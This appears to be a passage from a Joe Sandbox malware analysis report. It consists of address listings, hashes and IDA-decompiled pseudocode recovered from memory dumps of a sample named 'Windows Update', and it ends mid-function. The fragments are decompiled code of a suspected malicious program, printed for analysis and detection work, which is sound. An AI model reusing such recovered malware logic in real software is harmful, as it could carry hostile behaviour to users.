                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ec50
                                                                                  0x00f4ea8f
                                                                                  0x00f4ea92
                                                                                  0x00f4ea95
                                                                                  0x00f4ea95
                                                                                  0x00f4ea99
                                                                                  0x00f4ea9e
                                                                                  0x00f4ea9f
                                                                                  0x00f4eaa3
                                                                                  0x00f4eaa6
                                                                                  0x00f4eaa9
                                                                                  0x00f4eaae
                                                                                  0x00f4eab3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eab5
                                                                                  0x00f4eab9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eabb
                                                                                  0x00f4eac3
                                                                                  0x00f4ebce
                                                                                  0x00f4ebce
                                                                                  0x00f4ebd2
                                                                                  0x00f4ebd5
                                                                                  0x00f4ebdc
                                                                                  0x00f4ebdd
                                                                                  0x00f4ebe0
                                                                                  0x00f4ebe5
                                                                                  0x00f4ebe7
                                                                                  0x00f4ebe8
                                                                                  0x00f4ebeb
                                                                                  0x00f4ebee
                                                                                  0x00f4ebf3
                                                                                  0x00f4ebf8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ebfa
                                                                                  0x00f4ec01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ec03
                                                                                  0x00000000
                                                                                  0x00f4ec03
                                                                                  0x00f4ec37
                                                                                  0x00f4ec3a
                                                                                  0x00f4ec3b
                                                                                  0x00000000
                                                                                  0x00f4ec3b
                                                                                  0x00f4eac9
                                                                                  0x00f4eac9
                                                                                  0x00f4eacd
                                                                                  0x00f4ead2
                                                                                  0x00f4eb83
                                                                                  0x00f4eb83
                                                                                  0x00f4eb87
                                                                                  0x00f4eb89
                                                                                  0x00f4eb98
                                                                                  0x00f4eb98
                                                                                  0x00f4eb9c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb8f
                                                                                  0x00f4eba1
                                                                                  0x00f4eba3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eba5
                                                                                  0x00f4eba6
                                                                                  0x00f4ebaa
                                                                                  0x00f4ebab
                                                                                  0x00f4ebb4
                                                                                  0x00f4ebb9
                                                                                  0x00f4ebc1
                                                                                  0x00f4ebc4
                                                                                  0x00f4ebc7
                                                                                  0x00f4ebc8
                                                                                  0x00000000
                                                                                  0x00f4ebc8
                                                                                  0x00f4eb91
                                                                                  0x00f4eb95
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb97
                                                                                  0x00f4eb97
                                                                                  0x00f4eb9e
                                                                                  0x00000000
                                                                                  0x00f4eae1
                                                                                  0x00f4eae1
                                                                                  0x00f4eae3
                                                                                  0x00f4eb09
                                                                                  0x00f4eb09
                                                                                  0x00f4eb0d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb00
                                                                                  0x00f4eb7e
                                                                                  0x00f4eb13
                                                                                  0x00f4eb17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb25
                                                                                  0x00f4eb2d
                                                                                  0x00f4eb32
                                                                                  0x00f4eb36
                                                                                  0x00f4eb3b
                                                                                  0x00f4eb46
                                                                                  0x00f4eb55
                                                                                  0x00f4eb5d
                                                                                  0x00f4eb5e
                                                                                  0x00f4eb62
                                                                                  0x00f4eb6e
                                                                                  0x00f4eb74
                                                                                  0x00f4eb75
                                                                                  0x00000000
                                                                                  0x00f4eb75
                                                                                  0x00f4eb02
                                                                                  0x00f4eb06
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb08
                                                                                  0x00f4eb08
                                                                                  0x00f4eb0f
                                                                                  0x00000000
                                                                                  0x00f4eb0f
                                                                                  0x00f4ead2
                                                                                  0x00f4eaee
                                                                                  0x00f4eaf4
                                                                                  0x00f4eaf5
                                                                                  0x00000000
                                                                                  0x00f4eaf5
                                                                                  0x00000000

Strings
Memory Dump Source
• Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
Yara matches
Similarity
• API ID:
• String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
• API String ID: 0-2473593039
• Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
• Instruction ID: 97030255861f08fa7ceb3b970be00145aa5947ee7f7d3ec0789ceb9b9de53654
• Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
• Instruction Fuzzy Hash: 68F146B0C002599EDB21CF95D8487DEBFB0BB96318F5081CAD9593B241C7B90AC9DF98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 21%
			E00F41478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L00F503F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E00F4D9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E00F4104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L00F503FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E00F4D9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E00F4D9F2(_t68, _t89);
                                                                                  						_push(_t100 - 0x378);
                                                                                  						_push(0x412760);
                                                                                  						_push(_t97);
                                                                                  						_t71 = 0x7f;
                                                                                  						E00F4D9F2(_t71, _t89);
                                                                                  						_t105 = _t103 + 0x2c;
                                                                                  						if(_t87 != 3) {
                                                                                  							_push(_t100 - 0x278);
                                                                                  							_push(0x412664);
                                                                                  							_push(_t97);
                                                                                  							_t84 = 0x7f;
                                                                                  							E00F4D9F2(_t84, _t89);
                                                                                  							_t105 = _t105 + 0xc;
                                                                                  						}
                                                                                  						E00F4D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
                                                                                  						E00F4D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
                                                                                  						_t103 = _t105 + 0x18;
                                                                                  						_t98 =  *((intOrPtr*)(_t100 + 0x74));
                                                                                  						E00F412DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
                                                                                  						_push(_t98 + 0xa9c);
                                                                                  						_push(_t100 - 0xf4);
                                                                                  						L00F503FA();
                                                                                  						_pop(_t89);
                                                                                  						_t58 = E00F41279(_t100 - 0x408, _t111, _t98);
                                                                                  					}
                                                                                  					_t87 = _t87 + 1;
                                                                                  				} while (_t87 < 4);
                                                                                  				return _t58;
                                                                                  			}

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                  • API String ID: 0-3237638986
                                                                                  • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction ID: 7f5c2efa4bd059ce8f95a4a84211ad586e2e3b242cce9cc3e249677ab55c694f
                                                                                  • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction Fuzzy Hash: 46415FB290021DABDB20DF90CD85ADE3BA8EF14304F104566FD18D7191D7B89A98CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00EFC77E(char* __ebx, signed int* __esi) {
                                                                                  				signed int _t158;
                                                                                  				signed int _t160;
                                                                                  				intOrPtr _t162;
                                                                                  				signed int _t164;
                                                                                  				void* _t167;
                                                                                  				signed char _t168;
                                                                                  				signed char _t170;
                                                                                  				signed int _t175;
                                                                                  				signed int _t181;
                                                                                  				signed int _t183;
                                                                                  				void* _t185;
                                                                                  				signed char _t196;
                                                                                  				intOrPtr* _t198;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  				signed int _t205;
                                                                                  				char* _t207;
                                                                                  				signed char* _t208;
                                                                                  				signed char* _t209;
                                                                                  				signed char* _t211;
                                                                                  				signed char* _t212;
                                                                                  				signed char _t213;
                                                                                  				signed char _t231;
                                                                                  				signed char* _t233;
                                                                                  				void* _t235;
                                                                                  				signed int _t236;
                                                                                  				void* _t239;
                                                                                  				void* _t241;
                                                                                  				void* _t242;
                                                                                  				void* _t244;
                                                                                  				signed int _t246;
                                                                                  				signed int _t248;
                                                                                  				char* _t250;
                                                                                  				signed char _t251;
                                                                                  				signed int* _t254;
                                                                                  				void* _t256;
                                                                                  				void* _t258;
                                                                                  				signed int* _t259;
                                                                                  				signed int* _t261;
                                                                                  				signed char _t262;
                                                                                  				void* _t263;
                                                                                  				void* _t265;
                                                                                  				signed int _t294;
                                                                                  				signed int _t306;
                                                                                  
                                                                                  				_t207 = __ebx;
                                                                                  				 *((char*)(_t265 + 0x13)) = 0;
                                                                                  				 *((char*)(_t265 + 0x1d)) = 1;
                                                                                  				if(( *(__ebx + 2) & 0x00000001) == 0) {
                                                                                  					if( *((char*)(_t265 + 0x13)) == 0) {
                                                                                  						_t254 = __esi + _t213;
                                                                                  						_t246 =  *(_t254 - 4);
                                                                                  						 *(_t265 + 0x34) =  *(_t265 + 0x34) & 0x00000000;
                                                                                  					} else {
                                                                                  						_t246 =  *__esi;
                                                                                  						_t254 =  &(__esi[2]);
                                                                                  						 *(_t265 + 0x34) = __esi[1];
                                                                                  					}
                                                                                  					 *(_t263 + 0x14) = _t254;
                                                                                  					 *((char*)(_t265 + 0x13)) = 0;
                                                                                  				} else {
                                                                                  					if( *((char*)(_t265 + 0x13)) == 0) {
                                                                                  						_t261 = _t259 + _t213;
                                                                                  						_t175 =  *(_t261 - 4);
                                                                                  						asm("cdq");
                                                                                  					} else {
                                                                                  						_t175 =  *_t259;
                                                                                  						_t232 = _t259[1];
                                                                                  						_t261 =  &(_t259[2]);
                                                                                  					}
                                                                                  					_t294 = _t232;
                                                                                  					 *(_t263 + 0x14) = _t261;
                                                                                  					if(_t294 > 0 || _t294 >= 0 && _t175 >= 0) {
                                                                                  						_t246 = _t175;
                                                                                  						 *(_t265 + 0x34) = _t232;
                                                                                  						if( *((char*)(_t265 + 0x26)) == 0) {
                                                                                  							 *((char*)(_t265 + 0x13)) = (_t175 & 0xffffff00 |  *((char*)(_t265 + 0x25)) == 0x00000000) - 0x00000001 & 0x00000020;
                                                                                  						} else {
                                                                                  							 *((char*)(_t265 + 0x13)) = 0x2b;
                                                                                  						}
                                                                                  					} else {
                                                                                  						asm("adc edx, 0x0");
                                                                                  						_t232 =  ~_t232;
                                                                                  						_t246 =  ~_t175;
                                                                                  						 *(_t265 + 0x34) = _t232;
                                                                                  						 *((char*)(_t265 + 0x13)) = 0x2d;
                                                                                  					}
                                                                                  				}
                                                                                  				_t160 = _t246 |  *(_t265 + 0x34);
                                                                                  				if(_t160 == 0) {
                                                                                  					 *(_t265 + 0x1f) = _t160;
                                                                                  				}
                                                                                  				if( *((char*)(_t265 + 0x27)) != 0) {
                                                                                  					_t213 = 0 |  *((intOrPtr*)(_t265 + 0x13)) != 0x00000000;
                                                                                  					_t205 =  *(_t265 + 0x20) - _t213;
                                                                                  					if( *(_t265 + 0x14) < _t205) {
                                                                                  						 *(_t265 + 0x14) = _t205;
                                                                                  					}
                                                                                  				}
                                                                                  				 *(_t265 + 0x18) = _t265 + 0x1a5;
                                                                                  				if( *(_t265 + 0x1c) == 0x10) {
                                                                                  					_t199 = E00F2BB5D(_t246,  *((intOrPtr*)(_t265 + 0x3c)), 0xa, 0);
                                                                                  					_t262 = _t213;
                                                                                  					 *((intOrPtr*)(_t265 + 0x3c)) = _t207;
                                                                                  					if(_t262 >= 4 || E00F2BADD(_t199, _t232, 0xa, 0) == 1 && _t232 == 0) {
                                                                                  						_t262 = 0;
                                                                                  					}
                                                                                  					_t200 = _t262 + _t262;
                                                                                  					_t114 = _t200 + 0x4441d4; // 0x12969
                                                                                  					_t213 =  *_t114;
                                                                                  					_t115 = _t200 + 0x4441d5; // 0x129
                                                                                  					 *((char*)(_t265 + 0x1a4)) =  *_t115;
                                                                                  					 *(_t265 + 0x1a3) = _t213;
                                                                                  					 *(_t265 + 0x18) = _t265 + 0x1a3;
                                                                                  				}
                                                                                  				_t162 =  *((intOrPtr*)(_t265 + 0x28));
                                                                                  				asm("cdq");
                                                                                  				_t256 = ( *(_t162 + 4) & 0x000000ff) + 0x444110;
                                                                                  				 *(_t265 + 0x40) =  *(_t162 + 1) & 0x000000ff;
                                                                                  				 *(_t265 + 0x44) = _t232;
                                                                                  				do {
                                                                                  					 *(_t265 + 0x1c) =  *(_t265 + 0x1c) - 1;
                                                                                  					_t164 = E00F2BB5D(_t246,  *((intOrPtr*)(_t265 + 0x3c)),  *(_t265 + 0x44),  *(_t265 + 0x44));
                                                                                  					_t306 = _t232;
                                                                                  					_t213 =  *((intOrPtr*)(_t213 + _t256));
                                                                                  					 *( *(_t265 + 0x18)) = _t213;
                                                                                  					 *((intOrPtr*)(_t265 + 0x3c)) = _t207;
                                                                                  					_t246 = _t164;
                                                                                  					 *(_t265 + 0x34) = _t232;
                                                                                  				} while (_t306 > 0 || _t306 >= 0 && _t246 > 0);
                                                                                  				_t233 =  *(_t265 + 0x18);
                                                                                  				_t167 =  *(_t265 + 0x14) - _t265 + 0x1a5 + _t233;
                                                                                  				if(_t167 <= 0) {
                                                                                  					L90:
                                                                                  					_t168 =  *((intOrPtr*)(_t265 + 0x13));
                                                                                  					if(_t168 != 0) {
                                                                                  						_t233 = _t233 - 1;
                                                                                  						 *(_t265 + 0x18) = _t233;
                                                                                  						 *_t233 = _t168;
                                                                                  					}
                                                                                  					if( *(_t265 + 0x1f) == 0) {
                                                                                  						L97:
                                                                                  						_t258 = _t265 + 0x1a5 - _t233;
                                                                                  						_t248 =  *(_t265 + 0x20);
                                                                                  						if( *((char*)(_t265 + 0x1e)) == 0) {
                                                                                  							_t193 = _t248 - _t258;
                                                                                  							if(_t248 - _t258 > 0) {
                                                                                  								E00EFC500(_t193,  *((intOrPtr*)(_t263 + 8)));
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t258 > 0) {
                                                                                  							E00EFCC69( *((intOrPtr*)(_t263 + 8)),  *(_t265 + 0x1c), _t258);
                                                                                  						}
                                                                                  						if( *((char*)(_t265 + 0x1e)) != 0) {
                                                                                  							_t188 = _t248 - _t258;
                                                                                  							if(_t248 - _t258 > 0) {
                                                                                  								E00EFC500(_t188,  *((intOrPtr*)(_t263 + 8)));
                                                                                  							}
                                                                                  						}
                                                                                  						if( *(_t265 + 0x2c) != 0) {
                                                                                  							E00EFC110( *(_t265 + 0x2c));
                                                                                  						}
                                                                                  						 *(_t263 + 0x10) =  &(( *(_t263 + 0x10))[1]);
                                                                                  						_t158 =  *( *(_t263 + 0x10));
                                                                                  						if(_t158 != 0) {
                                                                                  							_t208 =  *(_t263 + 0x10);
                                                                                  							_t259 =  *(_t263 + 0x14);
                                                                                  							if(_t158 == 0x25) {
                                                                                  								L8:
                                                                                  								_t209 =  &(_t208[1]);
                                                                                  								_t170 =  *_t209;
                                                                                  								 *(_t263 + 0x10) = _t209;
                                                                                  								if(_t170 == 0) {
                                                                                  									_t158 = E00EFCC69( *((intOrPtr*)(_t263 + 8)), 0x44a2c4, 1);
                                                                                  									goto L98;
                                                                                  								} else {
                                                                                  									 *((char*)(_t265 + 0x27)) = 0;
                                                                                  									 *(_t265 + 0x1f) = 0;
                                                                                  									 *((char*)(_t265 + 0x25)) = 0;
                                                                                  									 *((char*)(_t265 + 0x26)) = 0;
                                                                                  									 *((char*)(_t265 + 0x1e)) = 0;
                                                                                  									do {
                                                                                  										_t235 = _t170 - 0x20;
                                                                                  										if(_t235 == 0) {
                                                                                  											 *((char*)(_t265 + 0x25)) = 1;
                                                                                  											goto L21;
                                                                                  										}
                                                                                  										_t239 = _t235 - 1;
                                                                                  										if(_t239 == 0) {
                                                                                  											goto L21;
                                                                                  										}
                                                                                  										_t241 = _t239;
                                                                                  										if(_t241 == 0) {
                                                                                  											 *(_t265 + 0x1f) = 1;
                                                                                  											goto L21;
                                                                                  										}
                                                                                  										_t242 = _t241 - 8;
                                                                                  										if(_t242 == 0) {
                                                                                  											 *((char*)(_t265 + 0x26)) = 1;
                                                                                  											goto L21;
                                                                                  										}
                                                                                  										_t244 = _t242;
                                                                                  										if(_t244 == 0) {
                                                                                  											 *((char*)(_t265 + 0x1e)) = 1;
                                                                                  											goto L21;
                                                                                  										}
                                                                                  										if(_t244 != 3) {
                                                                                  											break;
                                                                                  										}
                                                                                  										 *((char*)(_t265 + 0x27)) = 1;
                                                                                  										L21:
                                                                                  										_t209 =  &(_t209[1]);
                                                                                  										_t170 =  *_t209;
                                                                                  										 *(_t263 + 0x10) = _t209;
                                                                                  									} while (_t170 != 0);
                                                                                  									 *(_t265 + 0x20) =  *(_t265 + 0x20) & 0x00000000;
                                                                                  									if(_t170 != 0x2a) {
                                                                                  										if(_t170 < 0x30) {
                                                                                  											L31:
                                                                                  											if(_t170 != 0x2e) {
                                                                                  												 *(_t265 + 0x14) =  *(_t265 + 0x14) | 0xffffffff;
                                                                                  												L41:
                                                                                  												if(_t170 != 0x6c) {
                                                                                  													 *((char*)(_t265 + 0x1d)) = 0;
                                                                                  													L45:
                                                                                  													 *((char*)(_t265 + 0x13)) = 0;
                                                                                  													L46:
                                                                                  													_t250 = 0x444140;
                                                                                  													_t207 = 0x444140;
                                                                                  													 *((intOrPtr*)(_t265 + 0x28)) = 0x444140;
                                                                                  													 *(_t265 + 0x1c) = 0;
                                                                                  													_t236 = 0;
                                                                                  													while(_t170 !=  *_t250) {
                                                                                  														_t250 = _t250 + 6;
                                                                                  														_t236 = _t236 + 1;
                                                                                  														if(_t250 < 0x4441b2) {
                                                                                  															continue;
                                                                                  														}
                                                                                  														L53:
                                                                                  														 *(_t265 + 0x2c) =  *(_t265 + 0x2c) & 0x00000000;
                                                                                  														_t213 = 4;
                                                                                  														if( *(_t265 + 0x14) > 0x136 && ( *(_t207 + 2) & _t213) == 0) {
                                                                                  															 *(_t265 + 0x14) = 0x136;
                                                                                  														}
                                                                                  														_t232 =  *(_t265 + 0x1c);
                                                                                  														_t158 = ( *(_t265 + 0x1c) & 0x000000ff) - 1;
                                                                                  														if(_t158 > 0xf) {
                                                                                  															goto L98;
                                                                                  														} else {
                                                                                  															goto ( *((intOrPtr*)(0x413c1c + _t158 * 4)));
                                                                                  														}
                                                                                  													}
                                                                                  													_t207 = 0x444140 + _t236 * 6;
                                                                                  													 *((intOrPtr*)(_t265 + 0x28)) = _t207;
                                                                                  													if( *((intOrPtr*)(_t263 + 0xc)) != 0 || ( *(_t207 + 2) & 0x00000002) == 0) {
                                                                                  														 *(_t265 + 0x1c) =  *((intOrPtr*)(_t207 + 3));
                                                                                  														goto L53;
                                                                                  													} else {
                                                                                  														goto L98;
                                                                                  													}
                                                                                  												}
                                                                                  												_t211 =  &(_t209[1]);
                                                                                  												_t170 =  *_t211;
                                                                                  												 *((char*)(_t265 + 0x1d)) = 1;
                                                                                  												 *(_t263 + 0x10) = _t211;
                                                                                  												if(_t170 != 0x6c) {
                                                                                  													goto L45;
                                                                                  												}
                                                                                  												_t212 =  &(_t211[1]);
                                                                                  												_t170 =  *_t212;
                                                                                  												 *((char*)(_t265 + 0x13)) = 1;
                                                                                  												 *(_t263 + 0x10) = _t212;
                                                                                  												goto L46;
                                                                                  											}
                                                                                  											 *(_t265 + 0x14) =  *(_t265 + 0x14) & 0x00000000;
                                                                                  											_t209 =  &(_t209[1]);
                                                                                  											_t170 =  *_t209;
                                                                                  											 *(_t263 + 0x10) = _t209;
                                                                                  											if(_t170 != 0x2a) {
                                                                                  												while(_t170 >= 0x30) {
                                                                                  													if(_t170 > 0x39) {
                                                                                  														goto L41;
                                                                                  													}
                                                                                  													_t48 = _t170 - 0x30; // -48
                                                                                  													_t209 =  &(_t209[1]);
                                                                                  													 *(_t265 + 0x14) =  *(_t265 + 0x14) * 0xa + _t48;
                                                                                  													_t170 =  *_t209;
                                                                                  													 *(_t263 + 0x10) = _t209;
                                                                                  												}
                                                                                  												goto L41;
                                                                                  											}
                                                                                  											_t181 =  *_t259;
                                                                                  											 *(_t263 + 0x14) = _t259;
                                                                                  											 *(_t265 + 0x14) = _t181;
                                                                                  											if(_t181 < 0) {
                                                                                  												 *(_t265 + 0x14) =  ~( *(_t265 + 0x14));
                                                                                  											}
                                                                                  											_t209 =  &(_t209[1]);
                                                                                  											_t170 =  *_t209;
                                                                                  											 *(_t263 + 0x10) = _t209;
                                                                                  											goto L41;
                                                                                  										}
                                                                                  										while(_t170 <= 0x39) {
                                                                                  											_t33 = _t170 - 0x30; // -48
                                                                                  											_t209 =  &(_t209[1]);
                                                                                  											 *(_t265 + 0x20) =  *(_t265 + 0x20) * 0xa + _t33;
                                                                                  											_t170 =  *_t209;
                                                                                  											 *(_t263 + 0x10) = _t209;
                                                                                  											if(_t170 >= 0x30) {
                                                                                  												continue;
                                                                                  											}
                                                                                  											break;
                                                                                  										}
                                                                                  										L29:
                                                                                  										if( *(_t265 + 0x20) > 0x154) {
                                                                                  											 *(_t265 + 0x20) = 0x154;
                                                                                  										}
                                                                                  										goto L31;
                                                                                  									}
                                                                                  									_t183 =  *_t259;
                                                                                  									_t259 =  &(_t259[1]);
                                                                                  									 *(_t263 + 0x14) = _t259;
                                                                                  									 *(_t265 + 0x20) = _t183;
                                                                                  									if(_t183 < 0) {
                                                                                  										 *(_t265 + 0x20) =  ~( *(_t265 + 0x20));
                                                                                  										 *((char*)(_t265 + 0x1e)) = 1;
                                                                                  									}
                                                                                  									_t209 =  &(_t209[1]);
                                                                                  									_t170 =  *_t209;
                                                                                  									 *(_t263 + 0x10) = _t209;
                                                                                  									goto L29;
                                                                                  								}
                                                                                  							} else {
                                                                                  								 *(_t265 + 0x18) = _t208;
                                                                                  								_t185 = 1;
                                                                                  								while(1) {
                                                                                  									_t208 =  &(_t208[1]);
                                                                                  									_t251 =  *_t208;
                                                                                  									if(_t251 == 0x25) {
                                                                                  										break;
                                                                                  									}
                                                                                  									if(_t251 == 0) {
                                                                                  										break;
                                                                                  									} else {
                                                                                  										_t185 = _t185 + 1;
                                                                                  										continue;
                                                                                  									}
                                                                                  								}
                                                                                  								_t158 = E00EFCC69( *((intOrPtr*)(_t263 + 8)),  *(_t265 + 0x1c), _t185);
                                                                                  								if(_t251 == 0) {
                                                                                  									goto L98;
                                                                                  								}
                                                                                  								goto L8;
                                                                                  							}
                                                                                  						} else {
                                                                                  						}
                                                                                  						L98:
                                                                                  						return _t158;
                                                                                  					} else {
                                                                                  						_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0x28)) + 5));
                                                                                  						if(_t196 == 0) {
                                                                                  							goto L97;
                                                                                  						}
                                                                                  						_t198 = (_t196 & 0x000000ff) + 0x444134;
                                                                                  						_t231 =  *_t198;
                                                                                  						if(_t231 == 0) {
                                                                                  							goto L97;
                                                                                  						} else {
                                                                                  							goto L95;
                                                                                  						}
                                                                                  						do {
                                                                                  							L95:
                                                                                  							_t233 = _t233 - 1;
                                                                                  							_t198 = _t198 + 1;
                                                                                  							 *_t233 = _t231;
                                                                                  							_t231 =  *_t198;
                                                                                  						} while (_t231 != 0);
                                                                                  						 *(_t265 + 0x18) = _t233;
                                                                                  						goto L97;
                                                                                  					}
                                                                                  				} else {
                                                                                  					goto L88;
                                                                                  				}
                                                                                  				do {
                                                                                  					L88:
                                                                                  					_t233 = _t233 - 1;
                                                                                  					_t167 = _t167 - 1;
                                                                                  					 *_t233 = 0x30;
                                                                                  				} while (_t167 > 0);
                                                                                  				 *(_t265 + 0x18) = _t233;
                                                                                  				goto L90;
                                                                                  			}
                                                                                  0x00efc77e
                                                                                  0x00efc77e
                                                                                  0x00efc783
                                                                                  0x00efc78c
                                                                                  0x00efc7f2
                                                                                  0x00efc802
                                                                                  0x00efc804
                                                                                  0x00efc807
                                                                                  0x00efc7f4
                                                                                  0x00efc7f7
                                                                                  0x00efc7f9
                                                                                  0x00efc7fc
                                                                                  0x00efc7fc
                                                                                  0x00efc80c
                                                                                  0x00efc80f
                                                                                  0x00efc78e
                                                                                  0x00efc793
                                                                                  0x00efc79f
                                                                                  0x00efc7a1
                                                                                  0x00efc7a4
                                                                                  0x00efc795
                                                                                  0x00efc795
                                                                                  0x00efc797
                                                                                  0x00efc79a
                                                                                  0x00efc79a
                                                                                  0x00efc7a5
                                                                                  0x00efc7a7
                                                                                  0x00efc7aa
                                                                                  0x00efc7cb
                                                                                  0x00efc7cd
                                                                                  0x00efc7d1
                                                                                  0x00efc7e7
                                                                                  0x00efc7d3
                                                                                  0x00efc7d3

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
Yara matches
Similarity
• API ID: __aulldvrm$__aullrem
• String ID: +$@AD
• API String ID: 643879872-3073025900
• Opcode ID: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
• Instruction ID: db793c5f85abe5273684e886cd92057b9df984c79da888ab5f6343c8fafb13b7
• Opcode Fuzzy Hash: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
• Instruction Fuzzy Hash: 2AC19E7150838D8ED715CF28864477ABBE0AFDA708F38685DEAC4A6251D374DA48CB92
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 45%
E00F460BE(signed int _a4) {
	char _v5;
	char _v6;
	char _v7;
	char _v8;
	char _v9;
	char _v10;
	char _v11;
	char _v12;
	char _v13;
	char _v14;
	char _v15;
	char _v16;
	char _v17;
	char _v18;
	char _v19;
	char _v20;
	char _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	char _v291;
	char _v292;
	char _v547;
	char _v548;
	char _v1058;
	char _v1060;
	char _v1570;
	char _v1572;
	char* _t81;
	char* _t82;
	signed int _t84;
	signed int _t85;
	signed int _t87;
